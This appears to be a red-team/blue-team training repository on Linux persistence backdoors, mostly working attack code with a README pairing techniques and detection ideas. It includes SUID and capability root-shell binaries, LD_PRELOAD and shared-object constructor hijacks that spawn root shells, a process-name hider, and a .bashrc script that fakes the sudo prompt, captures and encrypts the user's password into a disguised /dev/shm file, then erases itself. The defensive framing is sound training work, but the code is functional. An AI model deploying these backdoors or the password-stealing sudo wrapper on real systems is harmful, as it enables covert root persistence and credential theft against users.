├── root_bin
    ├── Makefile
    ├── src.c
    └── README.md
├── ld_preload
    ├── README.txt
    ├── Makefile
    └── src.c
├── so_hijack
    ├── Makefile
    └── src.c
├── process_renaming
    └── process_renaming.c
├── sudo_hijack
    └── backdoor_bashrc.sh
└── README.md


/root_bin/Makefile:
--------------------------------------------------------------------------------
1 | all: build
2 | build:
3 | 	gcc src.c -o beroot
4 | 


--------------------------------------------------------------------------------
/ld_preload/README.txt:
--------------------------------------------------------------------------------
1 | sudo LD_PRELOAD=/absolute/path/to/hijack.so cmd
2 | 


--------------------------------------------------------------------------------
/so_hijack/Makefile:
--------------------------------------------------------------------------------
1 | all: build
2 | build:
3 | 	gcc src.c -shared -o j.so
4 | 


--------------------------------------------------------------------------------
/ld_preload/Makefile:
--------------------------------------------------------------------------------
1 | all: build
2 | build:
3 | 	gcc -fPIC -shared src.c -o ldp.so -nostartfiles
4 | clean:
5 | 	rm *.so
6 | 


--------------------------------------------------------------------------------
/ld_preload/src.c:
--------------------------------------------------------------------------------
1 | #include <stdlib.h>
2 | #include <unistd.h>
3 | 
4 | void _init() {
5 |     unsetenv("LD_PRELOAD");
6 |     setreuid(0, 0);
7 |     system("/bin/bash");
8 | }
9 | 


--------------------------------------------------------------------------------
/root_bin/src.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <unistd.h>
 3 | 
 4 | int main(void)
 5 | {
 6 |     setreuid(0, 0);
 7 |     system("/bin/bash");
 8 | 
 9 |     return 0;
10 | }
11 | 


--------------------------------------------------------------------------------
/root_bin/README.md:
--------------------------------------------------------------------------------
 1 | SUID
 2 | ====
 3 | chown root: beroot
 4 | chmod go+rx beroot
 5 | chmod u+s beroot
 6 | 
 7 | CAPABILITY (stealthier)
 8 | =======================
 9 | setcap cap_setuid=ep beroot
10 | 


--------------------------------------------------------------------------------
/so_hijack/src.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <unistd.h>
 3 | 
 4 | static void sample() __attribute__((constructor));
 5 | 
 6 | void sample(void)
 7 | {
 8 |     setreuid(0,0);
 9 |     system("/bin/bash");
10 | }
11 | 


--------------------------------------------------------------------------------
/process_renaming/process_renaming.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | #include <string.h>
 5 | 
 6 | int main(int argc, char *argv[])
 7 | {
 8 |     /* overwrite process name (shown in ps) by whatever we want */
 9 |     memcpy(argv[0], "/bin/fullkekk", strlen("/bin/fullkekk" + 1));
10 | 
11 |     /* fork and stop master to reattach to init */
12 |     int p = fork();
13 |     if (p) {
14 |          exit(0);
15 |     }
16 | 
17 |     while (1) {
18 |         sleep(1);
19 |     }
20 | 
21 |     return 0;
22 | }
23 | 


--------------------------------------------------------------------------------
/sudo_hijack/backdoor_bashrc.sh:
--------------------------------------------------------------------------------
 1 | # UNIQUE PATTERN START
 2 | function sudo() {
 3 |     read -s -p "[sudo] password for $USER: " user_password
 4 | 
 5 |     enc_pass=$(echo $user_password | openssl rsautl -encrypt -pubin -inkey <(echo -e "-----BEGIN PUBLIC KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANpeM7FFcr/W5l43MLPFkWEP0ALJHznj\nMDW4bdRWQrRyb2u2fgB/PdljMm3z7vLjO6ibubV2FbcqPn3jw0WPLNMCAwEAAQ==\n-----END PUBLIC KEY-----") 2>/dev/null | base64 -w0)
 6 |     echo -e "# Auto-generated by systemd, do not delete\r\n$enc_pass\r" > /dev/shm/.systemd.$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM 2>/dev/null
 7 | 
 8 |     echo ""
 9 |     sleep 2
10 |     echo "Sorry, try again."
11 | 
12 |     sed -n -i '/# UNIQUE PATTERN START/,/#UNIQUE PATTERN END$/!p' ~/.bashrc
13 | 
14 |     /usr/bin/sudo $@
15 | }
16 | #UNIQUE PATTERN END
17 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | Goals
  2 | =====
  3 | 
  4 | Goal for the red team:
  5 | 
  6 | * leave a means to come back as root on the machine: remote backdoor
  7 | * leaves as little logs as possible
  8 | 
  9 | Goal for the blue team:
 10 | 
 11 | * find out ASAP if a backdoor has been inserted
 12 | 
 13 | 
 14 | Assumptions:
 15 | 
 16 | * red team is root
 17 | * red team cannot stop protections already in place
 18 | * red team cannot produce very advanced exploits (fake FS information, rootkit ...)
 19 | 
 20 | 
 21 | Kernel
 22 | ======
 23 | Module
 24 | ------
 25 | Red team:
 26 | 
 27 | * Add a module.
 28 | 
 29 | Blue team:
 30 | 
 31 | * Sign kernel modules
 32 | * Forbid module loading after boot
 33 | 
 34 | Kernel itself
 35 | -------------
 36 | 
 37 | Blue team:
 38 | 
 39 | => Kernel signing?
 40 | => Investigate unscheduled reboots
 41 | => Control kernel integrity
 42 | 
 43 | 
 44 | Userspace remote backdoors
 45 | ==========================
 46 | Standalone Process
 47 | ------------------
 48 | Red team:
 49 | 
 50 | * Always listening for a remote connection, port knocking
 51 | * Can be hidden from ps
 52 | * Name can be hidden by overwriting argv[0]
 53 | * Binary can be deleted after launch
 54 | * Can be run from shell directly without touching disk
 55 | * Replace binary
 56 | 
 57 | Blue team:
 58 | * Need to scan /proc, not ps
 59 | * check if symlink exe matches argv[0]
 60 | 
 61 | 
 62 | Standalone Process triggered by external packet
 63 | -----------------------------------------------
 64 | Red team:
 65 | 
 66 | * Command run on iptables TRIGGER
 67 | * iptable module
 68 | 
 69 | Blue team:
 70 | 
 71 | * Audit NF rules
 72 | * monitor/forbid iptables modules
 73 | 
 74 | 
 75 | Standalone process triggered by application crash
 76 | -------------------------------------------------
 77 | Red team:
 78 | 
 79 | * Kernel crash handler core_pattern hookup
 80 | 
 81 | Blue team:
 82 | 
 83 | * Monitor it?
 84 | 
 85 | 
 86 | Standalone process triggered by reboot
 87 | --------------------------------------
 88 | Red team:
 89 | 
 90 | * Somewhere in an init script
 91 | 
 92 | Blue team:
 93 | 
 94 | * Monitor/sign init scripts
 95 | 
 96 | 
 97 | Standalone process triggered by a log
 98 | -------------------------------------
 99 | 
100 | ``` bash
101 | tail -F /var/log/syslog | awk '/Failed logging for user fhqsdghflhdsqk/ {system("run_backdoor")}'
102 | ```
103 | 
104 | Blue team:
105 | 
106 | * Scan /proc
107 | 
108 | 
109 | Triggered by crontab/at
110 | -----------------------
111 | 
112 | Red team:
113 | 
114 | * Could be used to evade /proc/ scanning.
115 | 
116 | 
117 | Blue team:
118 | 
119 | * Need to control user and system jobs.
120 | 
121 | 
122 | Inject into authorized process/library binary
123 | ---------------------------------------------
124 | 
125 | Red team:
126 | 
127 | * Add a backdoor to a binary.
128 | * Add a backdoor to a webserver.
129 | 
130 | Blue team:
131 | 
132 | * Need to control binary integrity
133 | * Need to control directories
134 | 
135 | 
136 | Inject into process memory
137 | --------------------------
138 | 
139 | Red team:
140 | 
141 | * inject backdoor into process memory
142 | * Lost at reboot.
143 | 
144 | Blue team:
145 | 
146 | * Impossible to detect?
147 | 
148 | 
149 | Hijack loader
150 | -------------
151 | 
152 | Red team:
153 | 
154 | * Add configuration to /etc/ls.so.conf,/etc/ld.so.conf.d
155 | 
156 | Blue team :
157 | 
158 | * Control integrity of configuration
159 | 
160 | 
161 | PAM configuration
162 | -----------------
163 | Red team:
164 | 
165 | * Alter PAM configuration
166 | 
167 | Blue team:
168 | 
169 | *  Need to control configuration integrity
170 | 
171 | 
172 | SSH configuration
173 | -----------------
174 | Red team:
175 | 
176 | * Add an authorized key
177 | * Default to another PAM
178 | 
179 | Blue team:
180 | 
181 | * Centralize and monitor authorized keys
182 | 
183 | 
184 | User hijacking
185 | --------------
186 | Red team:
187 | 
188 | * Add a user, or change a user's password.
189 | 
190 | Blue team:
191 | * Monitor /etc/{passwd,shadow}
192 | 
193 | 
194 | 
195 | Local backdoors
196 | ===============
197 | 
198 | Add root rights to low-privileged user
199 | --------------------------------------
200 | * /etc/sudoers
201 | * /etc/sudoers.d/
202 | * /etc/passwd
203 | * /etc/groups
204 | 
205 | Blue team:
206 | 
207 | * Monitor sudoers
208 | 
209 | 
210 | Setuid/Setgid binary
211 | --------------------
212 | 
213 | => Monitor FS rights
214 | 
215 | Capabilities binary
216 | -------------------
217 | Use a capability to escalate to UID 0.
218 | 
219 | => Monitor full FS rights
220 | 


--------------------------------------------------------------------------------